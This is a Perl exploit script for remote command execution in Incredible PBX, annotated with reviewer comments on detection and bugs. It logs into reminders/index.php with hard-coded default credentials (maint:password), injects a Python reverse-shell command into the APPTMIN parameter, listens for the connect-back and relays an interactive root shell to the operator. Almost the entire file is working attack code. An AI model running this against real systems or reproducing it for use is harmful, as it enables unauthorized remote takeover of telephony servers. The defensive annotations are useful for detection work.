#!/usr/bin/perl
use LWP::UserAgent;
use MIME::Base64;
use IO:: Socket ;
use strict;
# Clear the terminal (`cls` on Windows, `clear` elsewhere) and print the
# tool's fixed header block. Prints only; the return value is not used.
sub banner {
    my $clear_cmd = ($^O eq 'MSWin32') ? 'cls' : 'clear';
    system($clear_cmd);
    my $rule = "====================================================\n";
    print $rule;
    print "--- Incredible PBX remote command execution exploit\n";
    print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
    print "--- MorXploit Research www.MorXploit.com\n";
    print $rule;
}
# Usage check: three positional arguments are expected.
# NOTE(review): defined() is applied to the result of the && chain, so a
# defined-but-false argument such as "0" short-circuits the chain and the
# check passes even if the remaining arguments are missing; `@ARGV < 3`
# would express the intent directly.
if (! defined ( $ARGV [0] && $ARGV [1] && $ARGV [2])) {
    banner();
    print "perl $0 <target> <connectbackIP> <connectbackport>\n" ;
    exit ;
}
# Positional arguments: $host is used verbatim as the left part of
# "$host/$vuln", so it carries the scheme/host (and port) of the target.
my $host = $ARGV [0];
my $vuln = "reminders/index.php" ;      # script the requests below are sent to
my $cbhost = $ARGV [1];                 # address/port the injected command connects back to
my $cbport = $ARGV [2];
# Hard-coded default credentials, sent as HTTP Basic auth on every request.
# The base64 of "maint:password" is therefore a fixed string in the traffic
# and in the web server's access/auth logs.
my $defuser = "maint" ;
my $defpass = "password" ;
my $string = "$defuser:$defpass" ;
# NOTE(review): encode_base64 appends a trailing newline unless its second
# argument is '' — that newline is part of $encoded as used in the header.
my $encoded = encode_base64( $string );
$| = 1;                  # unbuffered STDOUT, so relayed output is not held back
$SIG {CHLD} = 'IGNORE' ; # auto-reap the child forked in copy_data_bidi; no wait()/waitpid() is called anywhere in this file
# Connect-back listener on all interfaces, bound before any request is sent.
# An inbound TCP connection from the target to this port is the observable
# second half of this script's activity.
# NOTE(review): the spaces inside "IO:: Socket ::INET" look like a copy
# artifact of this listing; the constructor is IO::Socket::INET->new.
my $l_sock = IO:: Socket ::INET->new(
    Proto => "tcp" ,
    LocalPort => "$cbport" ,
    Listen => 1,
    LocalAddr => "0.0.0.0" ,
    Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n" ;
# Return one User-Agent string chosen uniformly at random from a fixed list
# of six desktop browser strings.
sub randomagent {
    my @agents = (
        'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31',
    );
    my $index = int(rand(scalar @agents));
    return $agents[$index];
}
# HTTP client: one of the fixed User-Agent strings from randomagent(), a
# 10 s timeout, and TLS hostname verification switched off
# (verify_hostname => 0), so an https:// target with a mismatched
# certificate is not rejected.
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua ->timeout(10);
$ua ->agent( $useragent );
# Probe request: a plain GET of the script with the default Basic
# credentials. Anything other than a success response ends the run here.
my $status = $ua ->get( "$host/$vuln" , Authorization => "Basic $encoded" );
unless ( $status ->is_success) {
    banner();
    print "[-] Error: " . $status ->status_line . "\n" ;
    exit ;
}
banner();
print "[*] MorXploiting $host/$vuln\n" ;
# Injected value: a one-line Python program that connects to $cbhost:$cbport,
# duplicates the connection onto fd 0/1/2 and runs an interactive /bin/sh on
# it. It is placed in the APPTMIN query parameter between two ';' characters;
# presumably the server-side script passes that parameter into a shell
# command unsanitised (not verifiable from this file).
# Detection: a single GET to reminders/index.php whose query string carries
# the literal "morx" filler values, a ';' inside APPTMIN, and the base64 of
# the default "maint:password" credentials, followed by an outbound TCP
# connection from the web host to the address given in the query.
my $payload = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$cbhost\",$cbport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" ;
my $get = "APPTDA=morx&APPTPHONE=morx&APPTMO=morx&APPTMIN=;$payload;&APPTHR=morx" ;
# The response to this request is assigned but never inspected; the script
# proceeds to wait for the connection regardless of the status code.
my $exploit = $ua ->get( "$host/$vuln?$get" , Authorization => "Basic $encoded" );
print "[+] Sent payload! Waiting for connect back root shell ...\n" ;
# Block until one inbound connection arrives, stop listening, and relay the
# terminal to that connection (copy_data_bidi is defined further down).
# NOTE(review): accept() returning undef (e.g. interrupted) is not checked;
# copy_data_bidi would then be handed undef.
my $a_sock = $l_sock -> accept ();
$l_sock -> shutdown (SHUT_RDWR);
copy_data_bidi( $a_sock );
# Relay between the terminal and $socket using two processes: the forked
# child copies socket -> STDOUT, the parent copies STDIN -> socket. Returns
# (in the parent) when the STDIN copy loop ends; the child is then sent
# SIGTERM. No value is returned.
sub copy_data_bidi {
    my ( $socket ) = @_ ;
    my $child_pid = fork ();
    # NOTE(review): fork() returns undef on failure, which also satisfies
    # !$child_pid, so a failed fork runs the "child" branch in the only process.
    if (! $child_pid ) {
        close (STDIN);                   # child only reads from the socket
        copy_data_mono( $socket , *STDOUT);
        $socket -> shutdown (SHUT_RD);
        exit ();
    } else {
        close (STDOUT);                  # parent only writes to the socket
        copy_data_mono(*STDIN, $socket );
        $socket -> shutdown (SHUT_WR);   # half-close: no more data will be written to the peer
        kill ( "TERM" , $child_pid );    # child is not waited for; $SIG{CHLD} = 'IGNORE' is set at top level
    }
}
# Copy bytes from filehandle $src to $dst in chunks of at most 4096 bytes
# until sysread returns 0 (EOF) or undef (error), or until a syswrite
# returns 0/undef. No value is returned.
sub copy_data_mono {
    my ( $src , $dst ) = @_ ;
    my $buf ;
    while ( my $read_len = sysread ( $src , $buf , 4096)) {
        my $write_len = $read_len ;
        while ( $write_len ) {
            # NOTE(review): syswrite is given the whole of $buf with no
            # offset, so after a short write the next iteration re-sends the
            # buffer from its start rather than only the unwritten tail.
            my $written_len = syswrite ( $dst , $buf );
            return unless $written_len ;
            $write_len -= $written_len ;
        }
    }
}